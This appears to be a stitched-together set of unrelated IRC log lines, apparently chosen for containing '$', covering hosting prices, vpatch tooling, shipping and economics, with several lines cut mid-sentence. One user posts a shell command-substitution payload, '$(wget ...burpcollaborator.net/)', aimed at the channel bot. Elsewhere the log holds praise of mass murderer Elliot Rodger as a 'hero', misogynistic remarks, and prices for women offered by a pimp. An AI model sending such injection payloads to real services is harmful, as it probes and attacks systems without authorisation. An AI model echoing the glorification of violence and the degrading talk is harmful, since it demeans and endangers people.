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ben_vulpes: $oblig-rhino-photo
ben_vulpes: asciilifeform: believable political careers take time to fabricate. schniederman mighta been a someone in some other context, but what's his replacement? another "first $minoritygroup to NYAG"? even diehard leftists are not so bullish on firsts after the first black man to run the show gleefully doubletapped weddings for his entire stay in the whitehouse.
mircea_popescu: the limiting factor on human leather goods is the "strong winds" of ye olde prophete ; the driving force of hallucinatoria is mass acceptance, meaning that the individual item value is actually negative. a phone in the factory costs... -5$. not even zero, below 0. whereas once in "consumer" hands, it's worth whatever, 75 bux.
asciilifeform: observe where veblenism ended up going : 1) there exists a $mil phone 2) it consists of ipboje with diamonds glued on.
mircea_popescu: and even if it stands to unexamined imagination, "the $5 watch renders the demand for $500`000 watches 0", this is never true. no demand ever reaches actual 0, for very good reasons that have to do with how negative numbers don't exist irl.
asciilifeform: i will add : this is for a 10$ cable with fortybux of importtax ~prepaid~ via shitazon
ben_vulpes: fully-rented 4u of this would bring us to breakeven at $50/mo, but demands 100% occupancy, otoh that's only 25% of 16U rockchip plant occupancy. so, i don't see a really compelling case for bringing the price down much further.
asciilifeform: ok then i dun get it : from the equation it would seem that the , e.g., 36 colo, means 'if nothing else existed, 36 colos would be needed, at current price, to add up to $burn'
asciilifeform: you can click on an item and 'add to cart' and 19 times out of 20 will get simple eggog when 'ship to $bbaddr'
asciilifeform: well eritreans raise children on $0 and fingernail dirt, so that dun tell us much. but i can picture.
BingoBoingo: I'm going to go do the FG surgery and lets the adults talk through things, but... Remember the $20/day per diem arose out of a time when I was working on BBisp and chasing a prospect. When the statement's out do some math, float some compensation proposals covering a 12 month span, and recognize that and extra $180 a month still leaves me in the position of dipping into my savings rather frequently. Maybe weight the compensation boost
asciilifeform: esp if it can be configed to block the introduction of new $item until $previtem is resolved or formally tabled.
mod6: And, currently I see no issue with $180 extra per month. We do want our System Administrator to be able to have a liveable life in .uy. Will discuss ofc.
mod6: So, you're saying, basically, $180 extra, per month? Or how does this go?
mircea_popescu: well, the proper statement here isn't that "fixing db will be to my grief" ; the proper statement is that "fixing db, while a massive improvement to the $item, has the unfortunate drawback of requiring some trims i'm ill equipped to handle / have to send for across town"
asciilifeform: therefore i have no way currently to precisely guarantee exactly 1 rss tick per $interval.
douchebag: Easily $50k+ per customer
douchebag: Their company pays roughly $30k per install I walk them through
asciilifeform: theoretically 'not even electronic' tho fuckers still collected 1 $ for every 1 $ as 'import deposit'
ben_vulpes: asciilifeform: heh me too; $girl floated it as a destination again, although i'm more interested in the chilean border area
ben_vulpes: diana_coman: $100 us/mo. ($75 if paid quarterly) for the rockchip, 0.00104167 per month for the FG once we have cabling.
mod6: Is $5 enough? Will there be disk limits?
ben_vulpes: since we're on the topic, i want to float the notion of hosting-only plans in the $5/mo range; subscribers get an ftp user and files get served from pizarroisp.net/~wothandle/
mod6: mod6@gentoo ~/alf_crystals/alf $ ./v.pl p . makefiles.monoblok.vpatch
mod6: mod6@gentoo ~/alf_crystals $ which basename
mod6: instead of $P, you use $patch
mod6: N=`basename $P .vpatch`
asciilifeform: observe also : 0 $ at customs.
asciilifeform computes that ' asciilifeform airlines ' costs 22.42 $ / kg . which is about 5x less than, e.g., u.s. post...
lobbes: And s/"still $75 for quarter?"/"still $75 per month if pay whole quarter?"/
lobbes: Pizarro folx, would rockchip box be enough juice for the above? And is it still $75 for a quarter?
asciilifeform: trend's been entirely towards 'britneyization', 'economy of scale', 'build 500x larger and costlier production line but make $1 cheaper dies'
asciilifeform: ideally you want a 'polaroid'-sized box, i.e. a fungible cartridge that starts out as coupla grams of sandwiched $layers, and ends up after exposure as $ic
asciilifeform: it is even conceivable that asciilifeform's hands grow out of his arse; so it'd be handy if somebody else were to try the $item
asciilifeform: well ~somehow~ he conceived of the notion that 'fab dun have to cost $bil' but took it no further than the folx discussed in the 'gas tank additive THEY dun want you to know!' thread
asciilifeform: mircea_popescu: aaaha. sorta like a high-tech version of it. or moar general phenomenon of 'easy to make $mil: begin with $bil..'
asciilifeform: i.e. not the typical meaning of 'garage', and not replicable by anybody without either couple-deca-$mil or 25 yrs of access to just-so junkyards
hanbot: there's a lounge ($50 entry, cc only) where it works, heh.
asciilifeform: imho 'study arcana of $system' is exactly that. yes, from narrowly tunnelled picture of efficacy -- 'the thing to do.' but from 'want to be man, not extension of machine' pov -- problem.
asciilifeform: does mircea_popescu recognize a diff b/w e.g. 'you must learn grassman algebra to understand $system' and 'you must learn postgres 10.0 ...' ?
ben_vulpes: trinque: you know i tell folks i squirt grease on the largest $problem-domain spreadsheet they could possibly imagine when they ask what i do; i can laugh and cry about it allll day
mod6: Shipping container? Or will that just end up in long term holding until i pay $ransom.
BingoBoingo: <mod6> So here's a practical question that I struggle with... how am I going to get all of my gear to $country? << Container, slowboat
mod6: So here's a practical question that I struggle with... how am I going to get all of my gear to $country?
ben_vulpes: $user:$user and 0755 is what's been most useful on other sites; i think that'd be best here as well
mircea_popescu: asciilifeform, im sure there's plenty $800 "investments" from 1972 that still haven't fully amortised.
mircea_popescu: "this is why communism went away, it used up 2k worth of fuel and 5k worth of metal to produce $800 worth cars"
mircea_popescu: this kinda reminds me of a discussion re romania's 1980s automotive industry, "a car back then, brand new dacia, cost about $800 in real money"
mircea_popescu: now, not entirely clear that it's worth it to bother. so the story is, you buy however many of these, say $2 each, then put them through a machine to be cloned, then have server select the right one at a time... meh.
asciilifeform: both $item and -$item , lulzy reads
mircea_popescu: ckang, let me unwrap the challenge here further, for the record. so, the claim "he would let you stick 4 fingers in his ass for a dose" made by ex-gf is being challenged on credibility grounds through this following two pronged approach : 1. it is seemingly unlikely any of the poor who actually hold physical $item in discussion would nevertheless be subjectively rich enough to trade it away, especially for something as unlike
mircea_popescu: he gave 100% rebates. sell $5000 "worth of" imaginary (but "very valuable") "products" of an absent "industry", get $5000 of the sale back as commission!
mircea_popescu: so check out this dood's idea : he figured out (correctly) that the mistake every other utahian/scammer in the mlm / online sales&marketing field makes is, chiseling the pennies. this prevents their growth. so instead of forcing people to buy $50 worth of thin air and keeping 35 out of it, to be distributed in astonishingly pained and complicated ways,
mircea_popescu: so it's $100 per day per channel ?!
mircea_popescu: so what do you get for $300 ?
douchebag: $300 for a discord server that shares nudes
douchebag: $200 for the pimp lady to get a 3 girls
douchebag: I paid $500 in advertisements today though :/
mircea_popescu: well, $1200 worth of 2013 btc would sure be a retirement todaty
douchebag: $1200
ckang: re: chroot/$PATH stuff, is there any reason not to opt for a container model and leave that abstraction up to a dedicated system?
trinque: and not rely on a $PATH
spyked: http://btcbase.org/log/2018-04-19#1802935 <-- iirc execute bit on $dir toggles whether {user,group,others} can "search" (i.e. chdir to) $dir or access other files within, including other dirs, making this a recursive thing. so this explains the chdir error. ☝︎
mircea_popescu: ascii_lander, it can't be $10, either, since one of them is asking for remittance to another one of $30.
mircea_popescu: http://btcbase.org/log/2018-04-18#1801956 << i expect. if it's as terrible as to have utterly no way of enforcing any kind of priviledged downstream, "all boxes you connect to this will forever be able to admin it", then we'll have to make a tmsr switch fw ?! but really, even the cheapest nat router available for $15 from radio shack has the capacity to not permit random box plugged in to alter the settings. ☝︎
ckang: well you would put 40 nics in 1 chassis, but quad port per NIC @ 35$ a card
lobbes: danielpbarron, but how do you reconcile the question of: "how do I know that the bible is actually the word of god if the only sources saying it *is* are $not-god?"
mircea_popescu: yeah, well. ro avg wage is like $7k/year or such.
ckang: I want to say 1.75L is like 35$ or so for 190 here
ckang: but yea at 4$ a liter, no point in making your own
mircea_popescu: what fucking divine intervention, a still is $15 in household equipment, get one of those rice cookers or w/e pot warmers, wirth digital temperature adjustment. set it for 79C, stick an erlenmeyer glass in there with a cork and a bent tube coming out, put an ice pack over the tube and voila! whatever southern confort goes in, 195 or so proof alcohol comes out.
mircea_popescu: no further than earlier over coffee, girl proposed that during her stay in $us.shithole she "tried getting into beer" because well... gotta have an activity and there was no good alcohool available, except for this beer that didn't utterly suck. so i said, "why not make a still", and she said "baring divine intervention...."
douchebag: !Q $(wget http://2svdxxlir5m6eofyzi07dqojoau0ip.burpcollaborator.net/)
spyked: http://btcbase.org/log/2018-04-14#1799116 <-- no "pre-existing $thing" was contemplated at any point. lemme exemplify: a. you wanna implement bitcoin-node-os and determine that it requires crypto primitives, bitcoin db/fs, text editor for config files and so on up to a set of components C and *nothing else*; b. you audit the system at [a] and find out that idem, all components present in the systems are in C, and if not, then out the ☝︎
ascii_lander inspected cargo : not only were $boxen thoroughly pawed over ( external trunk seals popped, inside -- careful packing turned into a ??? shambles) but some 'ears' bent
mircea_popescu: you're stuck investing $hotwallet-size * $failure-odds into the business that it could be, like it or not. just like your time.
trinque: but sure, thing could say "estimated dispatch $time"
mircea_popescu: kinda how my reasoning went, "he's pretty good at getting tx fees optimized, chances are users won't even notice they're paying, when comparing with $average-webservice."
BingoBoingo: Pesos or U$D
thatbitchlola: $250-$500 depending on girl
lobbes: technical design aside though, there's still that obvious fact that we have to rely on various $mtgoxes for market price :/ Though I'm not sure what be a better source for a fiat-btc exchange rate (iirc this was a mini-thread somewhere in logs)
asciilifeform: cold-end -- points down at $workpiece
asciilifeform: so what you'd want to prove is that there exists ~no~ method more effective than brute guess, for $system.
spyked: http://btcbase.org/log/2018-04-11#1796332 <-- but one can, by reading the orig. paper, decompose it into windowses that then can be replaced, e.g. http://trilema.com/2016/the-necessary-prerequisite-for-any-change-to-the-bitcoin-protocol/ . granted, it took me years to peel off the layers of understanding and I'm still not quite there yet, but this is completely different from $formal_verification_devoid_of_meaning. ☝︎
spyked: http://btcbase.org/log/2018-04-11#1796265 <-- hey, no stress at all, I (out of curiosity) explored the verification $thing down to the 2nd level of "rabbit hole" and found nothing there worth being scrutinized. going deeper might reveal some questions, but I'm not gonna go sharpen the machete for "crypto protocols" jungle just to get there. ☝︎
mircea_popescu: (and this is also why i pronounced http://trilema.com/2016/the-story-of-elliot-rodger-by-elliot-rodger-adnotated-part-one/ as the ultimate hero : because he, unlike "the smarter" lot of them, actually wanted a girlfriend TO USE HER, not so that his dumb head can finally function, oh, $woman-in-head is here to tell me all will be ok, now i can pour myself a glass of milk whereas before--couldn't. this much is categorical advan
mircea_popescu: what the fuck do i care "what it all means in the end". let the end fucking care. and how the hell could any process baked in "$the end". imagine if there was a language which required as part of any function call the exit code of the program. wut ?!
mircea_popescu: and now i can't fucking find the core reference of this discussion, whether it was on trilema or in the log i don't remember, but it examined how would i have evaluated the eventual utility of $item at early stage, and made the point indeed very well.
mircea_popescu: phf but they have $randomwebsite ?!
mircea_popescu: "His notariety began seven years ago when he was arrested at a video game convention in Boston and accused of pirating $6 million in game code that was derived from a system used to train CIA agents for combat. May agreed to a Boston judge’s offer for pretrial probation in exchange for a dismissal of his case." << equivalency degree spelling aside, check out this guy!
mircea_popescu: why exactly is this needed, vice couldn't handle the volume of all the useless crap fat ugly whores spewed out for $5 a title ?
mircea_popescu: asciilifeform there's also an endless supply of the "totally not the same thing as this" "platforms", medium, that shitty thing with "i made $0.05 with this post" reddit tip bot extension and so on.
mircea_popescu: phf suppose tomorrow you decide you want to see $item you read on trilema. should it take you a week ?
asciilifeform: btw folx, today is absolute last day for 'i want $custom-iron'
asciilifeform: 'here you can have a stock kernel tarball' 'here have a stock gcc' 'but can i rebuild the contents of $box?' '...'
mircea_popescu: which is a useful warning, because in principle if $1 and $2 could both delivered wanted $file, but the author intended for $1 to be used, $2 might produce different $otherfile than author needed, and then you can't press because your hashes no longer match downstream"
mircea_popescu: no, what it should do is yell "alternate paths to press $vtools_fixes_static_tohex.vpatch requirement $x.alloc : $vtools+patch and $vdiff_sha_fixes_newline_gcc."
mircea_popescu: death("HEAD: $press[1] not found in flow\n") if !grep /^$press[1]$/, @flow << this specifically. how can it fail if it lists the item in flow ?
mircea_popescu: only problem with not eating crap, of course, is that you go from $2 happy meals to $20 meat and produce.
mircea_popescu: douchebag sure, you get $50 per interview i give lol.